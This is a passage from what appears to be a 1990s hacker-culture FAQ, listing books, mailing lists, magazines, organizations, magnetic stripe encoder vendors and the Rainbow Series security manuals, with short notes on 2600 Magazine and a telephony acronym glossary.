  4030.   ISBN: 0-201-10150-5
  4031.  
  4032.   Protect Your Privacy: A Guide for PGP Users
  4033.   Author: William Stallings
  4034.   Publisher: Prentice-Hall
  4035.   Copyright Date: 1994
  4036.   ISBN: 0-13-185596-4
  4037.  
  4038.  
  4039. Programmed Threats
  4040. ~~~~~~~~~~~~~~~~~~
  4041.   The Little Black Book of Computer Viruses
  4042.   Author: Mark Ludwig
  4043.   Publisher: American Eagle Publications
  4044.   Copyright Date: 1990
  4045.   ISBN: 0-929408-02-0
  4046.  
  4047.         The original, and still the best, book on computer viruses.
  4048.         No media hype here, just good clean technical information.
  4049.  
  4050.   Computer Viruses, Artificial Life and Evolution
  4051.   Author: Mark Ludwig
  4052.   Publisher: American Eagle Publications
  4053.   Copyright Date: 1993
  4054.   ISBN: 0-929408-07-1
  4055.  
  4056.   Computer Viruses, Worms, Data Diddlers, Killer Programs, and Other
  4057.         Threats to Your System
  4058.   Author: John McAfee and Colin Haynes
  4059.   Publisher: St. Martin's Press
  4060.   Copyright Date: 1989
  4061.   ISBN: 0-312-03064-9 and 0-312-02889-X
  4062.  
  4063.   The Virus Creation Labs: A Journey Into the Underground
  4064.   Author: George Smith
  4065.   Publisher: American Eagle Publications
  4066.   Copyright Date: 1994
  4067.   ISBN:
  4068.  
  4069.  
  4070. Telephony
  4071. ~~~~~~~~~
  4072.   Engineering and Operations in the Bell System
  4073.   Author: R.F. Rey
  4074.   Publisher: Bell Telephont Laboratories
  4075.   Copyright Date: 1983
  4076.   ISBN: 0-932764-04-5
  4077.  
  4078.         Although hopelessly out of date, this book remains *THE* book
  4079.         on telephony.  This book is 100% Bell, and is loved by phreaks
  4080.         the world over.
  4081.  
  4082.   Telephony: Today and Tomorrow
  4083.   Author: Dimitris N. Chorafas
  4084.   Publisher: Prentice-Hall
  4085.   Copyright Date: 1984
  4086.   ISBN: 0-13-902700-9
  4087.  
  4088.   The Telecommunications Fact Book and Illustrated Dictionary
  4089.   Author: Ahmed S. Khan
  4090.   Publisher: Delmar Publishers, Inc.
  4091.   Copyright Date: 1992
  4092.   ISBN: 0-8273-4615-8
  4093.  
  4094.         I find this dictionary to be an excellent reference book on
  4095.         telephony, and I recommend it to anyone with serious
  4096.         intentions in the field.
  4097.  
  4098. N Tandy/Radio Shack Cellular Hardware
  4099.   Author: Judas Gerard and Damien Thorn
  4100.   Publisher: Phoenix Rising Communications
  4101.   Copyright Date: 1994
  4102.   ISBN:
  4103.  
  4104. N The Phone Book
  4105.   Author: Carl Oppendahl
  4106.   Publisher: Consumer Reports
  4107.   Copyright Date:
  4108.   ISBN: 0-89043-364-x
  4109.  
  4110.         Listing of every cellular ID in the us, plus roaming ports,
  4111.         and info numbers for each carrier.
  4112.  
  4113. N Principles of Caller I.D.
  4114.   Author:
  4115.   Publisher: International MicroPower Corp.
  4116.   Copyright Date:
  4117.   ISBN:
  4118.  
  4119.  
  4120. Hacking History and Culture
  4121. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4122.   The Hacker Crackdown: Law and Disorder on the Electronic Frontier
  4123.   Author: Bruce Sterling
  4124.   Publisher: Bantam Books
  4125.   Copyright Date: 1982
  4126.   ISBN: 0-553-56370-X
  4127.  
  4128.         Bruce Sterling has recently released the book FREE to the net.
  4129.         The book is much easier to read in print form, and the
  4130.         paperback is only $5.99.  Either way you read it, you will be
  4131.         glad you did.  Mr. Sterling is an excellent science fiction
  4132.         author and has brought his talent with words to bear on the
  4133.         hacking culture.  A very enjoyable reading experience.
  4134.  
  4135.   Cyberpunk
  4136.   Author: Katie Hafner and John Markoff
  4137.   Publisher: Simon and Schuster
  4138.   Copyright Date: 1991
  4139.   ISBN: 0-671-77879-X
  4140.  
  4141.   The Cuckoo's Egg
  4142.   Author: Cliff Stoll
  4143.   Publisher: Simon and Schuster
  4144.   Copyright Date: 1989
  4145.   ISBN: 0-671-72688-9
  4146.  
  4147.   Hackers: Heroes of the Computer Revolution
  4148.   Author: Steven Levy
  4149.   Publisher: Doubleday
  4150.   Copyright Date: 1984
  4151.   ISBN: 0-440-13495-6
  4152.  
  4153.  
  4154. Unclassified
  4155. ~~~~~~~~~~~~
  4156.   The Hacker's Handbook
  4157.   Author: Hugo Cornwall
  4158.   Publisher: E. Arthur Brown Company
  4159.   Copyright Date:
  4160.   ISBN: 0-912579-06-4
  4161.  
  4162.   Secrets of a Super Hacker
  4163.   Author: The Knightmare
  4164.   Publisher: Loompanics
  4165.   Copyright Date: 1994
  4166.   ISBN: 1-55950-106-5
  4167.  
  4168.         The Knightmare is no super hacker.  There is little or no real
  4169.         information in this book.  The Knightmare gives useful advice
  4170.         like telling you not to dress up before going trashing.
  4171.         The Knightmare's best hack is fooling Loompanics into
  4172.         publishing this garbage.
  4173.  
  4174.   The Day The Phones Stopped
  4175.   Author: Leonard Lee
  4176.   Publisher: Primus / Donald I Fine, Inc.
  4177.   Copyright Date: 1992
  4178.   ISBN: 1-55611-286-6
  4179.  
  4180.         Total garbage.  Paranoid delusions of a lunatic.  Less factual
  4181.         data that an average issue of the Enquirer.
  4182.  
  4183.   Information Warfare
  4184.   Author: Winn Swartau
  4185.   Publisher: Thunder Mountain Press
  4186.   Copyright Date: 1994
  4187.   ISBN: 1-56025-080-1
  4188.  
  4189.   An Illustrated Guide to the Techniques and Equipment of Electronic Warfare
  4190.   Author: Doug Richardson
  4191.   Publisher: Salamander Press
  4192.   Copyright Date:
  4193.   ISBN: 0-668-06497-8
  4194.  
  4195.  
  4196. 10. What are some videos of interest to hackers?
  4197.  
  4198. 'Unauthorized Access' by Annaliza Savage
  4199. $25 on VH S format in 38-min
  4200. Savage Productions
  4201. 1803 Mission St., #406
  4202. Santa Cruz, CA 95060
  4203.  
  4204.  
  4205. 11. What are some mailing lists of interest to hackers?
  4206.  
  4207.   Academic Firewalls
  4208.   Reflector Address:
  4209.   Registration Address: Send a message to majordomo@greatcircle.com
  4210.                         containing the line "subscribe firewalls user@host"
  4211.  
  4212. U Bugtraq
  4213.   Reflector Address:    bugtraq@fc.net
  4214.   Registration Address: bugtraq-request@fc.net
  4215.  
  4216.   Cert Tools
  4217.   Reflector Address:    cert-tools@cert.org
  4218.   Registration Address: cert-tools-request@cert.org
  4219.  
  4220.   Computers and Society
  4221.   Reflector Address:    Comp-Soc@limbo.intuitive.com
  4222.   Registration Address: taylor@limbo.intuitive.com
  4223.  
  4224.   Coordinated Feasibility Effort to Unravel State Data
  4225.   Reflector Address:    ldc-sw@cpsr.org
  4226.   Registration Address:
  4227.  
  4228.   CPSR Announcement List
  4229.   Reflector Address:    cpsr-announce@cpsr.org
  4230.   Registration Address:
  4231.  
  4232.   CPSR - Intellectual Property
  4233.   Reflector Address:    cpsr-int-prop@cpsr.org
  4234.   Registration Address:
  4235.  
  4236.   CPSR - Internet Library
  4237.   Reflector Address:    cpsr-library@cpsr.org
  4238.   Registration Address:
  4239.  
  4240.   DefCon Announcement List
  4241.   Reflector Address:
  4242.   Registration Address: Send a message to majordomo@fc.net containing
  4243.                         the line "subscribe dc-announce"
  4244.  
  4245.   DefCon Chat List
  4246.   Reflector Address:
  4247.   Registration Address: Send a message to majordomo@fc.net containing
  4248.                         the line "subscribe dc-stuff"
  4249.  
  4250. N IDS (Intruder Detection Systems)
  4251.   Reflector Address:
  4252.   Registration Address: Send a message to majordomo@wyrm.cc.uow.edu.au
  4253.                         containing the line "subscribe ids"
  4254.  
  4255.   Macintosh Security
  4256.   Reflector Address:    mac-security@eclectic.com
  4257.   Registration Address: mac-security-request@eclectic.com
  4258.  
  4259.   NeXT Managers
  4260.   Reflector Address:
  4261.   Registration Address: next-managers-request@stolaf.edu
  4262.  
  4263.   Phiber-Scream
  4264.   Reflector Address:
  4265.   Registration Address: Send a message to listserv@netcom.com
  4266.                         containing the line "subscribe phiber-scream user@host"
  4267.  
  4268. N phruwt-l (Macintosh H/P)
  4269.   Reflector Address:
  4270.   Registration Address: Send a message to filbert@netcom.com
  4271.                         with the subject "phruwt-l"
  4272.  
  4273.   rfc931-users
  4274.   Reflector Address:    rfc931-users@kramden.acf.nyu.edu
  4275.   Registration Address: brnstnd@nyu.edu
  4276.  
  4277.   RSA Users
  4278.   Reflector Address:    rsaref-users@rsa.com
  4279.   Registration Address: rsaref-users-request@rsa.com
  4280.  
  4281.  
  4282. 12. What are some print magazines of interest to hackers?
  4283.  
  4284. 2600 - The Hacker Quarterly
  4285. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4286. E-mail address: 2600@well.sf.ca.us
  4287.  
  4288. Subscription Address: 2600 Subscription Dept
  4289.                       PO Box 752
  4290.                       Middle Island, NY  11953-0752
  4291.  
  4292. Letters and article submission address: 2600 Editorial Dept
  4293.                                         PO Box 99
  4294.                                         Middle Island, NY  11953-0099
  4295.  
  4296. Subscriptions: United States: $21/yr individual, $50 corporate.
  4297.                Overseas: $30/yr individual, $65 corporate.
  4298.  
  4299.  
  4300. Gray Areas
  4301. ~~~~~~~~~~
  4302. Gray Areas examines gray areas of law and morality and subject matter
  4303. which is illegal, immoral and/oe controversial. Gray Areas explores
  4304. why hackers hack and puts hacking into a sociological framework of
  4305. deviant behavior.
  4306.  
  4307. E-Mail Address: grayarea@well.sf.ca.us
  4308. E-Mail Address: grayarea@netaxs.com
  4309.  
  4310. U.S. Mail Address: Gray Areas
  4311.                    PO Box 808
  4312.                    Broomall, PA 19008
  4313.  
  4314. Subscriptions: $26.00 4 issues first class
  4315.                $34.00 4 issues foreign (shipped air mail)
  4316.  
  4317.  
  4318. Privacy Newsletter
  4319. ~~~~~~~~~~~~~~~~~~
  4320. Privacy Newsletter is a monthly newsletter devoted to showing
  4321. consumers how to get privacy and keep it.
  4322.  
  4323. E-Mail Address: privacy@interramp.com
  4324.  
  4325. Subscription Address: Privacy Newsletter
  4326.                       P.O. Box 8206
  4327.                       Philadelphia, PA 19101-8206
  4328.  
  4329.  
  4330. Subscriptions: $99/yr (US)  $149/yr (Overseas)
  4331.  
  4332.  
  4333. Wired
  4334. ~~~~~
  4335. Subscription Address: subscriptions@wired.com
  4336.                   or: Wired
  4337.                       PO Box 191826
  4338.                       San Francisco, CA 94119-9866
  4339.  
  4340. Letters and article submission address: guidelines@wired.com
  4341.                                     or: Wired
  4342.                                         544 Second Street
  4343.                                         San Francisco, CA 94107-1427
  4344.  
  4345. Subscriptions: $39/yr (US) $64/yr (Canada/Mexico) $79/yr (Overseas)
  4346.  
  4347.  
  4348. Nuts & Volts
  4349. ~~~~~~~~~~~~
  4350. T& L Publications
  4351. 430 Princeland Court
  4352. Corona, CA 91719
  4353. (800)783-4624 (Voice) (Subscription Only Order Line)
  4354. (909)371-8497 (Voice)
  4355. (909)371-3052 (Fax)
  4356. CIS: 74262,3664
  4357.  
  4358.  
  4359. 13. What are some e-zines of interest to hackers?
  4360.  
  4361. CoTNo: Communications of The New Order    ftp.etext.org  /pub/Zines/CoTNo
  4362. Empire Times                              ftp.etext.org  /pub/Zines/Emptimes
  4363. Phrack                                    freeside.com
  4364.  
  4365.  
  4366. 14. What are some organizations of interest to hackers?
  4367.  
  4368. Computer Professionals for Social Responsibility (CPSR)
  4369. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4370. CPSR empowers computer professionals and computer users to advocate
  4371. for the responsible use of information technology and empowers all who
  4372. use computer technology to participate in the public debate.   As
  4373. technical experts, CPSR members provide the public and policymakers
  4374. with realistic assessments of the power, promise, and limitations of
  4375. computer technology.  As an organization of concerned citizens, CPSR
  4376. directs public attention to critical choices concerning the
  4377. applications of computing and how those choices affect society.
  4378.  
  4379. By matching unimpeachable technical information with policy
  4380. development savvy, CPSR uses minimum dollars to have maximum impact
  4381. and encourages broad public participation in the shaping of technology
  4382. policy.
  4383.  
  4384. Every project we undertake is based on five principles:
  4385.  
  4386. *  We foster and support public discussion of and public
  4387.    responsibility for decisions involving the use of computers in
  4388.    systems critical to society.
  4389.  
  4390. *  We work to dispel popular myths about the infallibility of
  4391.    technological systems.
  4392.  
  4393. *  We challenge the assumption that technology alone can solve
  4394.    political and social problems.
  4395.  
  4396. *  We critically examine social and technical issues within the
  4397.    computer profession, nationally and internationally.
  4398.  
  4399. *  We encourage the use of computer technology to improve the quality
  4400.    of life.
  4401.  
  4402. CPSR Membership Categories
  4403.   75  REGULAR MEMBER
  4404.   50  Basic member
  4405.  200  Supporting member
  4406.  500  Sponsoring member
  4407. 1000  Lifetime member
  4408.   20  Student/low income member
  4409.   50  Foreign subscriber
  4410.   50  Library/institutional subscriber
  4411.  
  4412. CPSR National Office
  4413. P.O. Box 717
  4414. Palo Alto, CA  94301
  4415. 415-322-3778
  4416. 415-322-3798 (FAX)
  4417. E-mail: cpsr@csli.stanford.edu
  4418.  
  4419.  
  4420. Electronic Frontier Foundation (EFF)
  4421. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4422. The Electronic Frontier Foundation (EFF) is dedicated to the pursuit
  4423. of policies and activities that will advance freedom and openness in
  4424. computer-based communications. It is a member-supported, nonprofit
  4425. group that grew from the conviction that a new public interest
  4426. organization was needed in the information age; that this organization
  4427. would enhance and protect the democratic potential of new computer
  4428. communications technology. From the beginning, the EFF determined to
  4429. become an organization that would combine technical, legal, and public
  4430. policy expertise, and would apply these skills to the myriad issues
  4431. and concerns that arise whenever a new communications medium is born.
  4432.  
  4433. Memberships are $20.00 per year for students, $40.00 per year for
  4434. regular members, and $100.00 per year for organizations.
  4435.  
  4436. The Electronic Frontier Foundation, Inc.
  4437. 666 Pennsylvania Avenue S.E., Suite 303
  4438. Washington, D.C.  20003
  4439. +1 202 544 9237
  4440. +1 202 547 5481 FAX
  4441. Internet: eff@eff.org
  4442.  
  4443.  
  4444. Free Software Foundation (FSF) and GNU
  4445. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4446.  
  4447. The Free Software Foundation is dedicated to eliminating restrictions
  4448. on people's right to use, copy, modify, and redistribute computer
  4449. programs. We promote the development and use of free software in all
  4450. areas using computers.  Specifically, we are putting together a
  4451. complete, integrated software system named "GNU" ("GNU's Not Unix",
  4452. pronounced "guh-new") that will be upwardly compatible with Unix.
  4453. Most parts of this system are already being used and distributed.
  4454.  
  4455. The word "free" in our name refers to freedom, not price.  You may or
  4456. may not pay money to get GNU software, but regardless you have two
  4457. specific freedoms once you get it: first, the freedom to copy a
  4458. program and give it away to your friends and co-workers; and second,
  4459. the freedom to chnage a program as you wish, by having full access to
  4460. source code. You can study the source and learn how such programs are
  4461. written.  You may then be able to port it, improve it, and share your
  4462. changes with others.  If you redistribute GNU software you may charge
  4463. a distribution fee or give it away, so long as you include the source
  4464. code and the GPL (GNU General Public License).
  4465.  
  4466. Free Software Foundation, Inc.        Telephone: +1-617-876-3296
  4467. 673 Massachusetts Avenue              Fax: +1-617-492-9057
  4468. Cambridge, MA 02139-3309 USA          Fax (in Japan): 0031-13-2473 (KDD)
  4469. Electronic mail: gnu@prep.ai.mit.edu                  0066-3382-0158 (IDC)
  4470.  
  4471. GNU is to be a complete integrated computational environment:
  4472. everything you need to work with a computer, either as a programmer or
  4473. as a person in an office or home.  The core is an operating system,
  4474. which consists of a central program called a kernel that runs the
  4475. other programs on the computer, and a large number of ancillary
  4476. programs for handling files, etc.  The Free Software Foundation is
  4477. developing an advanced kernel called the Hurd.
  4478.  
  4479. A complete system has tools for programmers, such as compilers and
  4480. debuggers.  It also has editors, sketchpads, calendars, calculators,
  4481. spreadsheets, databases, electronic mail readers, and Internet
  4482. navigators.  The FSF already distributes most of the programs used in
  4483. an operating system, all the tools regularly used by programmers, and
  4484. much more.
  4485.  
  4486.  
  4487. The League for Programming Freedom (LPF)
  4488. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4489. The League for Programming Freedom is an organization of people who
  4490. oppose the attempt to monopolize common user interfaces through "look
  4491. and feel" copyright lawsuits.  Some of us are programmers, who worry
  4492. that such monopolies will obstruct our work.  Some of us are users,
  4493. who want new computer systems to be compatible with the interfaces we
  4494. know.  Some are founders of hardware or software companies, such as
  4495. Richard P. Gabriel. Some of us are professors or researchers,
  4496. including John McCarthy, Marvin Minsky, Guy L. Steele, Jr., Robert S.
  4497. Boyer and Patrick Winston.
  4498.  
  4499. "Look and feel" lawsuits aim to create a new class of government-
  4500. enforced monopolies broader in scope than ever before.  Such a system
  4501. of user-interface copyright would impose gratuitous incompatibility,
  4502. reduce competition, and stifle innovation.
  4503.  
  4504. We in the League hope to prevent these problems by preventing
  4505. user-interface copyright.  The League is NOT opposed to copyright law
  4506. as it was understood until 1986 -- copyright on particular programs.
  4507. Our aim is to stop changes in the copyright system which would take
  4508. away programmers' traditional freedom to write new programs compatible
  4509. with existing programs and practices.
  4510.  
  4511. Annual dues for individual members are $42 for employed professionals,
  4512. $10.50 for students, and $21 for others.  We appreciate activists, but
  4513. members who cannot contribute their time are also welcome.
  4514.  
  4515. To contact the League, phone (617) 243-4091, send Internet mail to the
  4516. address league@prep.ai.mit.edu, or write to:
  4517.  
  4518. League for Programming Freedom
  4519. 1 Kendall Square #143
  4520. P.O. Box 9171
  4521. Cambridge, MA 02139 USA
  4522.  
  4523.  
  4524. SotMesc
  4525. ~~~~~~~
  4526. Founded in 1989, SotMesc is dedicated to preserving the integrity and
  4527. cohesion of the computing society.  By promoting computer education,
  4528. liberties and efficiency, we believe we can secure freedoms for all
  4529. computer users while retaining privacy.
  4530.  
  4531. SotMesc maintains the CSP Internet mailing list, the SotMesc
  4532. Scholarship Fund, and the SotMesc Newsletter.
  4533.  
  4534. The SotMESC is financed partly by membership fees, and donations, but
  4535. mostly by selling hacking, cracking, phreaking, electronics, internet,
  4536. and virus information and programs on disk and bound paper media.
  4537.  
  4538. SotMesc memberships are $20 to students and $40 to regular members.
  4539.  
  4540. SotMESC
  4541. P.O. Box 573
  4542. Long Beach, MS  39560
  4543.  
  4544.  
  4545. Computer Emergency Response Team (CERT
  4546. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4547.  
  4548. CERT is the Computer Emergency Response Team that was formed by the
  4549. Defense Advanced Research Projects Agency (DARPA) in November 1988 in
  4550. response to the needs exhibited during the Internet worm incident.
  4551. The CERT charter is to work with the Internet community to facilitate
  4552. its response to computer security events involving Internet hosts, to
  4553. take proactive steps to raise the community's awareness of computer
  4554. security issues, and to conduct research targeted at improving the
  4555. security of existing systems.
  4556.  
  4557. CERT products and services include 24-hour technical assistance for
  4558. responding to computer security incidents, product vulnerability
  4559. assistance, technical documents, and seminars.  In addition, the team
  4560. maintains a number of mailing lists (including one for CERT
  4561. advisories) and provides an anonymous FTP server:  cert.org
  4562. (192.88.209.5), where security-related documents, past CERT
  4563. advisories, and tools are archived.
  4564.  
  4565. CERT contact information:
  4566.  
  4567. U.S. mail address
  4568.   CERT Coordination Center
  4569.   Software Engineering Institute
  4570.   Carnegie Mellon University
  4571.   Pittsburgh, PA 15213-3890
  4572.   U.S.A.
  4573.  
  4574. Internet E-mail address
  4575.   cert@cert.org
  4576.  
  4577. Telephone number
  4578.   (412)268-7090 (24-hour hotline)
  4579.   CERT Coordination Center personnel answer
  4580.   7:30 a.m.- 6:00 p.m. EST(GMT-5)/EDT(GMT-4), on call for
  4581.   emergencies during other hours.
  4582.  
  4583. FAX number
  4584.   (412)268-6989
  4585.  
  4586.  
  4587. 15. Where can I purchase a magnetic stripe encoder/decoder?
  4588.  
  4589. CPU Advance
  4590. PO Box 2434
  4591. Harwood Station
  4592. Littleton, MA  01460
  4593. (508)624-4819 (Fax)
  4594.  
  4595. Omron Electronics, Inc.
  4596. One East Commerce Drive
  4597. Schaumburg, IL  60173
  4598. (800)556-6766 (Voice)
  4599. (708)843-7787 (Fax)
  4600.  
  4601. Security Photo Corporation
  4602. 1051 Commonwealth Avenue
  4603. Boston, MA 02215
  4604. (800)533-1162 (Voice)
  4605. (617)783-3200 (Voice)
  4606. (617)783-1966 (Voice)
  4607.  
  4608. Timeline Inc,
  4609. 23605 Telo Avenue
  4610. Torrence, CA 90505
  4611. (800)872-8878 (Voice)
  4612. (800)223-9977 (Voice)
  4613.  
  4614. Alltronics
  4615. 2300 Zanker Road
  4616. San Jose CA 95131
  4617. (408) 943-9774 Voice
  4618. (408) 943-9776 Fax
  4619. (408) 943-0622 BBS
  4620. Part Number: 92U067
  4621.  
  4622. Atalla Corp
  4623. San Jose, CA
  4624. (408) 435-8850
  4625.  
  4626.  
  4627. 16. What are the rainbow books and how can I get them?
  4628.  
  4629. Orange Book
  4630. DoD 5200.28-STD
  4631. Department of Defense Trusted Computer System Evaluation Criteria
  4632.  
  4633. Green Book
  4634. CSC-STD-002-85
  4635. Department of Defense Password Management Guideline
  4636.  
  4637. Yellow Book
  4638. CSC-STD-003-85
  4639. Computer Security Requirements -- Guidance for Applying the Department
  4640. of Defense Trusted Computer System Evaluation Criteria in Specific
  4641. Environments
  4642.  
  4643. Yellow Book
  4644. CSC-STD-004-85
  4645. Technical Rationale Behind CSC-STD-003-85: Computer Security
  4646. Requirements.  Guidance for Applying the Department of Defense Trusted
  4647. Computer System Evaluation Criteria in Specific Environments.
  4648.  
  4649. Tan Book
  4650. NCSC-TG-001
  4651. A Guide to Understanding Audit in Trusted Systems
  4652.  
  4653. Bright Blue Book
  4654. NCSC-TG-002
  4655. Trusted Product Evaluation - A Guide for Vendors
  4656.  
  4657. Neon Orange Book
  4658. NCSC-TG-003
  4659. A Guide to Understanding Discretionary Access Control in Trusted
  4660. Systems
  4661.  
  4662. Teal Green Book
  4663. NCSC-TG-004
  4664. Glossary of Computer Security Terms
  4665.  
  4666. Red Book
  4667. NCSC-TG-005
  4668. Trusted Network Interpretation of the Trusted Computer System
  4669. Evaluation Criteria
  4670.  
  4671. Orange Book
  4672. NCSC-TG-006
  4673. A Guide to Understanding Configuration Management in Trusted Systems
  4674.  
  4675. Burgundy Book
  4676. NCSC-TG-007
  4677. A Guide to Understanding Design Documentation in Trusted Systems
  4678.  
  4679. Dark Lavender Book
  4680. NCSC-TG-008
  4681. A Guide to Understanding Trusted Distribution in Trusted Systems
  4682.  
  4683. Venice Blue Book
  4684. NCSC-TG-009
  4685. Computer Security Subsystem Interpretation of the Trusted Computer
  4686. System Evaluation Criteria
  4687.  
  4688. Aqua Book
  4689. NCSC-TG-010
  4690. A Guide to Understanding Security Modeling in Trusted Systems
  4691.  
  4692. Dark Red Book
  4693. NCSC-TG-011
  4694. Trusted Network Interpretation Environments Guideline -- Guidance for
  4695. Applying the Trusted Network Interpretation
  4696.  
  4697. Pink Book
  4698. NCSC-TG-013
  4699. Rating Maintenance Phase -- Program Document
  4700.  
  4701. Purple Book
  4702. NCSC-TG-014
  4703. Guidelines for Formal Verification Systems
  4704.  
  4705. Brown Book
  4706. NCSC-TG-015
  4707. A Guide to Understanding Trusted Facility Management
  4708.  
  4709. Yellow-Green Book
  4710. NCSC-TG-016
  4711. Guidelines for Writing Trusted Facility Manuals
  4712.  
  4713. Light Blue
  4714. NCSC-TG-017
  4715. A Guide to Understanding Identification and Authentication in Trusted
  4716. Systems
  4717.  
  4718. Light Blue Book
  4719. NCSC-TG-018
  4720. A Guide to Understanding Object Reuse in Trusted Systems
  4721.  
  4722. Blue Book
  4723. NCSC-TG-019
  4724. Trusted Product Evaluation Questionnaire
  4725.  
  4726. Gray Book
  4727. NCSC-TG-020A
  4728. Trusted Unix Working Group (TRUSIX) Rationale for Selecting
  4729. Access Control List Features for the Unix System
  4730.  
  4731. Lavender Book
  4732. NCSC-TG-021
  4733. Trusted Data Base Management System Interpretation of the Trusted
  4734. Computer System Evaluation Criteria
  4735.  
  4736. Yellow Book
  4737. NCSC-TG-022
  4738. A Guide to Understanding Trusted Recovery in Trusted Systems
  4739.  
  4740. Bright Orange Book
  4741. NCSC-TG-023
  4742. A Guide to Understandng Security Testing and Test Documentation in
  4743. Trusted Systems
  4744.  
  4745. Purple Book
  4746. NCSC-TG-024  (Volume 1/4)
  4747. A Guide to Procurement of Trusted Systems: An Introduction to
  4748. Procurement Initiators on Computer Security Requirements
  4749.  
  4750. Purple Book
  4751. NCSC-TG-024 (Volume 2/4)
  4752. A Guide to Procurement of Trusted Systems: Language for RFP
  4753. Specifications and Statements of Work - An Aid to Procurement
  4754. Initiators
  4755.  
  4756. Purple Book
  4757. NCSC-TG-024  (Volume 3/4)
  4758. A Guide to Procurement of Trusted Systems: Computer Security Contract
  4759. Data Requirements List and Data Item Description Tutorial
  4760.  
  4761. +Purple Book
  4762. +NCSC-TG-024  (Volume 4/4)
  4763. +A Guide to Procurement of Trusted Systems: How to Evaluate a Bidder's
  4764. +Proposal Document - An Aid to Procurement Initiators and Contractors
  4765.  
  4766. Green Book
  4767. NCSC-TG-025
  4768. A Guide to Understanding Data Remanence in Automated Information
  4769. Systems
  4770.  
  4771. Hot Peach Book
  4772. NCSC-TG-026
  4773. A Guide to Writing the Security Features User's Guide for Trusted Systems
  4774.  
  4775. Turquiose Book
  4776. NCSC-TG-027
  4777. A Guide to Understanding Information System Security Officer
  4778. Responsibilities for Automated Information Systems
  4779.  
  4780. Violet Book
  4781. NCSC-TG-028
  4782. Assessing Controlled Access Protection
  4783.  
  4784. Blue Book
  4785. NCSC-TG-029
  4786. Introduction to Certification and Accreditation
  4787.  
  4788. Light Pink Book
  4789. NCSC-TG-030
  4790. A Guide to Understanding Covert Channel Analysis of Trusted Systems
  4791.  
  4792. C1 Technical Report-001
  4793. Computer Viruses: Prevention, Detection, and Treatment
  4794.  
  4795. *C Technical Report 79-91
  4796. *Integrity in Automated Information Systems
  4797.  
  4798. *C Technical Report 39-92
  4799. *The Design and Evaluation of INFOSEC systems: The Computer Security
  4800. *Contributions to the Composition Discussion
  4801.  
  4802. NTISSAM COMPUSEC/1-87
  4803. Advisory Memorandum on Office Automation Security Guideline
  4804.  
  4805. --
  4806.  
  4807. You can get your own free copy of any or all of the books by writing
  4808. or calling:
  4809.  
  4810.        INFOSEC Awareness Division
  4811.        ATTN: X711/IAOC
  4812.        Fort George G. Meade, MD  20755-6000
  4813.  
  4814.        Barbara Keller
  4815.        (410) 766-8729
  4816.  
  4817. If you ask to be put on the mailing list, you'll get a copy of each new
  4818. book as it comes out (typically a couple a year).
  4819.  
  4820. [* == I have not personally seen this book]
  4821. [+ == I have not personally seen this book, and I believe it may not]
  4822. [     be available]
  4823.  
  4824.  
  4825.  
  4826.  
  4827. Section D: 2600
  4828. ~~~~~~~~~~~~~~~
  4829.  
  4830. 01. What is alt.2600?
  4831.  
  4832. Alt.2600 is a Usenet newsgroup for discussion of material relating to
  4833. 2600 Magazine, the hacker quarterly.   It is NOT for the Atari 2600
  4834. game machine.  Len@netsys.com created the group on Emmanuel
  4835. Goldstein's recommendation.  Emmanuel is the editor/publisher of 2600
  4836. Magazine. Following the barrage of postings about the Atari machine to
  4837. alt.2600, an alt.atari.2600 was created to divert all of the atari
  4838. traffic from alt.2600.  Atari 2600 people are advised to hie over to
  4839. rec.games.video.classic.
  4840.  
  4841.  
  4842. 02. What does "2600" mean?
  4843.  
  4844.     2600Hz was a tone that was used by early phone phreaks (or
  4845. phreakers) in the 80's, and some currently.  If the tone was sent down the
  4846. line at the proper time, one could get away with all sorts of fun stuff.  
  4847.  
  4848. A note from Emmanuel Goldstein:
  4849.     
  4850. "The Atari 2600 has NOTHING to do with blue boxes or telephones
  4851. or the 2600 hertz tone.  The 2600 hertz tone was simply the first
  4852. step towards exploring the network.  If you were successful at 
  4853. getting a toll call to drop, then billing would stop at that
  4854. point but there would be billing for the number already dialed
  4855. up until the point of seizure.  800 numbers and long distance
  4856. information were both free in the past and records of who called
  4857. what were either non-existent or very obscure with regards to
  4858. these numbers.  This, naturally, made them more popular than
  4859. numbers that showed up on a bill, even if it was only for
  4860. a minute.  Today, many 800 numbers go overseas, which provides
  4861. a quick and free way into another country's phone system
  4862. which may be more open for exploration."
  4863.  
  4864.  
  4865. 03. Are there on-line versions of 2600 available?
  4866.  
  4867.     No.
  4868.  
  4869.  
  4870. 04. I can't find 2600 at any bookstores.  What can I do?
  4871.  
  4872. Subscribe.  Or, let 2600 know via the subscription address that you
  4873. think 2600 should be in the bookstore.  Be sure to include the
  4874. bookstores name and address.
  4875.  
  4876.  
  4877. 05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
  4878.  
  4879. A note from Emmanuel Goldstein:
  4880.  
  4881.   We've been selling 2600 at the same newsstand price ($4) since 1988
  4882.   and we hope to keep it at that price for as long as we can get away
  4883.   with it. At the same time, $21 is about the right price to cover
  4884.   subscriber costs, including postage and record keeping, etc. People
  4885.   who subscribe don't have to worry about finding an issue someplace,
  4886.   they tend to get issues several weeks before the newsstands get
  4887.   them, and they can take out free ads in the 2600 Marketplace.
  4888.  
  4889.   This is not uncommon in the publishing industry.  The NY Times, for
  4890.   example, costs $156.50 at the newsstands, and $234.75 delivered to your
  4891.   door.
  4892.  
  4893.  
  4894.  
  4895.  
  4896. Section E: Miscellaneous
  4897. ~~~~~~~~~~~~~~~~~~~~~~~~
  4898.  
  4899. 01. What does XXX stand for?
  4900.  
  4901. TLA     Three Letter Acronym
  4902.  
  4903. ACL     Access Control List
  4904. PIN     Personal Identification Number
  4905. TCB     Trusted Computing Base
  4906.  
  4907. ALRU    Automatic Line Record Update
  4908. AN      Associated Number
  4909. ARSB    Automated Repair Service Bureau
  4910. ATH     Abbreviated Trouble History
  4911. BOC     Bell Operating Company
  4912. BOR     Basic Output Report
  4913. BOSS    Business Office Servicing System
  4914. CA      Cable
  4915. COE     Central Office Equipment
  4916. COSMOS  Computer System for Main Frame Operations
  4917. CMC     Construction Maintenance Center
  4918. CNID    Calling Number IDentification
  4919. CO      Central Office
